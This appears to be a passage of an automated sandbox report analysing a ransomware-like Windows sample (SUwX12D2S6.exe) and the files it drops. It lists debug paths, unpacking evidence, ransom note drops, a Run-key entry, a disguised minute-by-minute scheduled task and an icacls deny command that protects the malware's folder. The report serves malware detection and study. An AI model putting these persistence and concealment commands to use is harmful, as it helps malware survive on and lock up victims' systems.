Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: SUwX12D2S6.exe, 00000004.00000003.2158386481.0000000003410000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2135310569.0000000003493000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2135411368.000000000340B000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2156718696.00000000033E7000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2136261874.000000000350D000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2136368733.0000000003534000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2157238464.000000000340B000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2135016253.00000000033F4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\RecoveryImproved\.pdb\ source: SUwX12D2S6.exe, 00000004.00000003.2231998014.0000000003853000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2223567308.000000000376A000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2226563641.0000000003853000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2233139919.000000000387B000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2232892838.000000000386A000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2231922111.000000000383E000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2223984909.000000000382F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ata\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\_m source: SUwX12D2S6.exe, 00000004.00000003.2185362388.00000000033FC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: HC:\bup-mage85\kuvovipor\soxecexar-kavah95\wibaju90_tavi60 p.pdb source: build3.exe, 0000000A.00000000.1805138719.0000000000401000.00000020.00000001.01000000.00000009.sdmp, build3.exe, 0000000A.00000002.1913333134.0000000000401000.00000020.00000001.01000000.00000009.sdmp, build3.exe, 00000010.00000000.1911812806.0000000000401000.00000020.00000001.01000000.00000009.sdmp, mstsca.exe, 00000013.00000000.1918990852.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, mstsca.exe, 00000013.00000002.2018872471.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, mstsca.exe, 00000014.00000000.2017466458.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, mstsca.exe, 00000019.00000002.2348608889.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, mstsca.exe, 00000019.00000000.2275814306.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, mstsca.exe, 0000001A.00000000.2347560708.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, mstsca.exe, 0000001C.00000002.2973317219.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, mstsca.exe, 0000001C.00000000.2865813530.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, mstsca.exe, 0000001D.00000000.2972376587.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, mstsca.exe, 0000001E.00000002.3583754315.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, mstsca.exe, 0000001E.00000000.3466010192.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, mstsca.exe, 0000001F.00000000.3582957712.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, mstsca.exe, 00000020.00000002.4129370107.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, mstsca.exe, 00000020.00000000.4066108806.0000000000401000.00000020.00000001.01000000.0000000A.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: SUwX12D2S6.exe, 00000004.00000003.2226957493.00000000038C6000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2225920544.00000000038C2000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2225038196.0000000003192000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2223567308.00000000038C2000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2217897189.00000000038AB000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2216202881.00000000038A9000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2218553034.00000000038C2000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2227590465.00000000038DF000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2217675191.00000000038A9000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2216776414.000000000318D000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2216475290.0000000003183000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\we\ source: SUwX12D2S6.exe, 00000004.00000003.2169696594.000000000350D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\e\AC\ source: SUwX12D2S6.exe, 00000004.00000003.2159195532.0000000003733000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\\f source: SUwX12D2S6.exe, 00000004.00000003.2135310569.0000000003493000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2110681040.00000000034F2000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2136261874.000000000350D000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2135016253.00000000033F4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\\Packa source: SUwX12D2S6.exe, 00000004.00000003.2136536137.0000000003169000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2110957880.000000000315A000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2135929742.0000000003168000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2136570770.000000000316F000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.1881793763.000000000316C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\censes] source: SUwX12D2S6.exe, 00000004.00000003.1882036014.0000000003148000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.1843805332.0000000003148000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: SUwX12D2S6.exe, 00000004.00000003.2170331603.0000000003576000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2184159938.0000000003576000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\Data source: SUwX12D2S6.exe, 00000004.00000003.2184159938.0000000003576000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\\\ source: SUwX12D2S6.exe, 00000004.00000003.2183331491.000000000376A000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2202393003.000000000376B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb.bgzq~ source: SUwX12D2S6.exe, 00000004.00000003.2110681040.00000000034F2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: SUwX12D2S6.exe, 00000004.00000003.2159195532.000000000375A000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2174356824.000000000375B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\e\5o source: SUwX12D2S6.exe, 00000004.00000003.2159543171.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2157718043.00000000031A3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: SUwX12D2S6.exe, 00000004.00000003.2185146314.0000000003802000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2202393003.00000000037AA000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2202710386.00000000037CB000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2203093794.00000000037E3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\a\* source: SUwX12D2S6.exe, 00000004.00000003.1881875981.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.1881957469.00000000033DC000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2110134134.00000000033F9000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2111097747.0000000003405000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\DC source: SUwX12D2S6.exe, 00000004.00000003.2136680554.000000000314E000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2136154375.0000000003148000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2110957880.000000000315A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: SUwX12D2S6.exe, 00000004.00000003.2110681040.00000000034F2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: SUwX12D2S6.exe, 00000004.00000003.2174680367.000000000345E000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2174757810.000000000346A000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2170130034.0000000003413000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2174049173.000000000341F000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2174506625.0000000003420000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\uf?% source: SUwX12D2S6.exe, 00000004.00000003.2135310569.0000000003493000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2110681040.00000000034F2000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2136261874.000000000350D000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2135016253.00000000033F4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\_ source: SUwX12D2S6.exe, 00000004.00000003.2242116659.000000000375B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\acrobat_sbx\Adobe\d.pdb source: SUwX12D2S6.exe, 00000004.00000003.2135310569.0000000003493000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2136261874.000000000350D000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2136368733.0000000003534000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2135016253.00000000033F4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\R source: SUwX12D2S6.exe, 00000004.00000003.2135310569.0000000003493000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2110681040.00000000034F2000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2136261874.000000000350D000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2136368733.0000000003534000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2135016253.00000000033F4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\e source: SUwX12D2S6.exe, 00000004.00000003.2185322786.00000000033C8000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2174464257.00000000033C4000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2169889587.00000000033C0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: SUwX12D2S6.exe, 00000004.00000003.2135697139.00000000033C5000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2110208589.00000000033B8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: SUwX12D2S6.exe, 00000004.00000003.2242116659.000000000375B000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2236436289.0000000003893000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\e\ source: SUwX12D2S6.exe, 00000004.00000003.2135697139.00000000033C5000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2110208589.00000000033B8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: build2.exe, 00000008.00000002.1970716529.0000000020E29000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.1970251533.000000001E8E8000.00000002.00001000.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb.bgzqqg.bgzq13be82808d6d800486d215022e11c6ece1ta\Application Data\Application Data\ApplicR source: SUwX12D2S6.exe, 00000004.00000003.2209794574.0000000003141000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2201372327.0000000003141000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2203525691.0000000003152000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\e\ source: SUwX12D2S6.exe, 00000004.00000003.2136536137.0000000003169000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2110957880.000000000315A000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2135929742.0000000003168000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2136570770.000000000316F000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.1881793763.000000000316C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\4 source: SUwX12D2S6.exe, 00000004.00000003.1881875981.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.1881957469.00000000033DC000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

barindex
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Unpacked PE file: 1.2.SUwX12D2S6.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Unpacked PE file: 4.2.SUwX12D2S6.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe Unpacked PE file: 6.2.SUwX12D2S6.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe Unpacked PE file: 12.2.SUwX12D2S6.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Local\7dff3941-d69c-460f-a7ee-d94d9d9159b1\build3.exe Unpacked PE file: 16.2.build3.exe.400000.0.unpack .text:ER;.data:W;.kic:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
Source: C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe Unpacked PE file: 24.2.SUwX12D2S6.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe Unpacked PE file: 26.2.mstsca.exe.400000.0.unpack .text:ER;.data:W;.kic:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe Unpacked PE file: 29.2.mstsca.exe.400000.0.unpack .text:ER;.data:W;.kic:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe Unpacked PE file: 31.2.mstsca.exe.400000.0.unpack .text:ER;.data:W;.kic:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Unpacked PE file: 1.2.SUwX12D2S6.exe.400000.0.unpack
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Unpacked PE file: 4.2.SUwX12D2S6.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe Unpacked PE file: 6.2.SUwX12D2S6.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe Unpacked PE file: 12.2.SUwX12D2S6.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\7dff3941-d69c-460f-a7ee-d94d9d9159b1\build3.exe Unpacked PE file: 16.2.build3.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe Unpacked PE file: 24.2.SUwX12D2S6.exe.400000.0.unpack
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe Unpacked PE file: 26.2.mstsca.exe.400000.0.unpack
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe Unpacked PE file: 29.2.mstsca.exe.400000.0.unpack
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe Unpacked PE file: 31.2.mstsca.exe.400000.0.unpack
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 1_2_00412220 GetCommandLineW,CommandLineToArgvW,PathFindFileNameW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,K32EnumProcesses,OpenProcess,K32EnumProcessModules,K32GetModuleBaseNameW,CloseHandle, 1_2_00412220
Source: sqln[1].dll.8.dr Static PE information: section name: .00cfg
Source: mstsca.exe.16.dr Static PE information: section name: .kic
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 0_2_004052B5 push ecx; ret 0_2_004052C8
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 0_2_0459E0AF push ecx; retf 0_2_0459E0B2
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 0_2_05E38F05 push ecx; ret 0_2_05E38F18
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 1_2_00428565 push ecx; ret 1_2_00428578
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 3_2_044310AF push ecx; retf 3_2_044310B2
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 3_2_05E08F05 push ecx; ret 3_2_05E08F18
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 4_2_0050D050 push eax; retn 004Dh 4_2_0050D6B5
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 4_2_0050D008 push eax; retn 004Dh 4_2_0050D6B5
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 4_2_0050D028 push eax; retn 004Dh 4_2_0050D6B5
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 4_2_0050D090 push eax; retn 004Dh 4_2_0050D6B5
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 4_2_0050D0A8 push eax; retn 004Dh 4_2_0050D6B5
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 4_2_0050D318 push eax; retn 004Dh 4_2_0050D6B5
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 4_2_0050C4E0 push eax; retn 004Dh 4_2_0050D6B5
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 4_2_0050D550 push eax; retn 004Dh 4_2_0050D6B5
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 4_2_00428565 push ecx; ret 4_2_00428578
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 4_2_0050D698 push eax; retn 004Dh 4_2_0050D6B5
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 4_2_0050C960 push eax; retn 004Dh 4_2_0050D6B5
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 4_2_0050C928 push eax; retn 004Dh 4_2_0050D6B5
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 4_2_0050C988 push eax; retn 004Dh 4_2_0050D6B5
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 4_2_0050C9A8 push eax; retn 004Dh 4_2_0050D6B5
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 4_2_0050CB78 push eax; retn 004Dh 4_2_0050D6B5
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 4_2_0050CD60 push eax; retn 004Dh 4_2_0050D6B5
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 4_2_0050CDF0 push eax; retn 004Dh 4_2_0050D6B5
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 4_2_0050CE58 push eax; retn 004Dh 4_2_0050D6B5
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 4_2_0050CF28 push eax; retn 004Dh 4_2_0050D6B5
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 4_2_0050CFC0 push eax; retn 004Dh 4_2_0050D6B5
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 4_2_0050CF90 push eax; retn 004Dh 4_2_0050D6B5

Persistence and Installation Behavior

barindex
Source: C:\Users\user\Desktop\SUwX12D2S6.exe System file written: C:\Users\user\AppData\Local\Temp\chrome.exe Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe File created: C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\7dff3941-d69c-460f-a7ee-d94d9d9159b1\build3.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\7dff3941-d69c-460f-a7ee-d94d9d9159b1\build2.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\sqln[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\SUwX12D2S6.exe File created: C:\_README.txt Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe File created: C:\$WinREAgent\_README.txt Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe File created: C:\$WinREAgent\Scratch\_README.txt Jump to behavior
Source: C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe File created: C:\_README.txt
Source: C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe File created: C:\Users\user\_README.txt

Boot Survival

barindex
Source: C:\Users\user\AppData\Local\7dff3941-d69c-460f-a7ee-d94d9d9159b1\build3.exe Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe"
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SysHelper Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SysHelper Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Code function: 0_2_00404F7E EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_00404F7E
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot Jump to behavior
Source: C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Users\user\AppData\Local\7dff3941-d69c-460f-a7ee-d94d9d9159b1\build2.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
Source: C:\Users\user\AppData\Local\7dff3941-d69c-460f-a7ee-d94d9d9159b1\build2.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Process created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666" /deny *S-1-1-0:(OI)(CI)(DE,DC)
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
